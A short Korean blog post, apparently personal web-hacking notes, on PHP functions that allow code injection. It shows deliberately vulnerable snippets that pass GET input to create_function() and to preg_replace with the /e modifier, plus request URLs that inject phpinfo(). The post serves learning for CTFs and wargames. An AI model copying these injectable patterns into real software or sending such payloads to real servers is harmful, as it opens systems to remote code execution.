일반적인 취약한 함수.
http://stackoverflow.com/questions/3115559/exploitable-php-functions
http://web.securityinnovation.com/appsec-weekly/blog/bid/79067/Disable-Dangerous-Functions-in-PHP
http://blog.naver.com/postmebi/90173864551
등등 검색하면 많이나옴.
요런것도 있다.
http://www.80sec.com/php-create_function-commond-injection-vulnerability.html
create_function()으로도 쉘 실행시키는게 가능하다고 함.
서버 구성.(index.php)
<?php create_function('$a', 'return $a[0];}' . $_GET['a'] . ';/*];'); ?>
아래처럼 보내보면 phpinfo()가 실행된다.
http://localhost/index.php?a=phpinfo();
워게임이나 ctf에 자주 보이는 preg_replace()도 주의할것. e옵션으로 php함수 실행 가능.
구분자가 //인데 //말고 {}등의 다른 구분자도 쓰일 수 있음.
<?php preg_replace("//e",$_GET[foo],"");?>
http://localhost/index.php?foo=phpinfo()
처럼 실행.
'webhacking > etc' 카테고리의 다른 글
codeshell.kr adm1nkyj trick 1, 2 (0) | 2015.08.25 |
---|---|
이전 ctf연구 (hack.lu) (0) | 2015.08.22 |
codeshell.kr hash col, dummy 64 (0) | 2015.08.10 |
byte flipping attack 문서 번역, 실습 (0) | 2015.08.05 |
php wrapper (추가예정) (0) | 2015.07.28 |